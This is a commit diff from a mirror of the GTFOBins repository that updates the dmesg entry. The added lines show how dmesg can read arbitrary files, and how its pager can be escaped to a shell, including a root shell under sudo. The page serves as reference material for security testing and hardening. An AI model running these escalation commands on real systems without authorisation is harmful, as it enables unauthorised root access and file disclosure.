mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 08:48:54 +01:00 
			
		
		
		
	Update dmesg.md
This commit is contained in:
		| @@ -1,9 +1,17 @@ | ||||
| --- | ||||
| description: | | ||||
|   This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. | ||||
| functions: | ||||
|   sudo: | ||||
|   file-read: | ||||
|     - code: | | ||||
|         LFILE=file_to_read | ||||
|         dmesg -F "$LFILE" | ||||
|   shell: | ||||
|     - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. | ||||
|       code: | | ||||
|         dmesg -H | ||||
|         !/bin/sh | ||||
|   sudo: | ||||
|     - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. | ||||
|       code: | | ||||
|         sudo dmesg -H | ||||
|         !/bin/sh | ||||
| --- | ||||
|   | ||||
		Reference in New Issue
	
	Block a user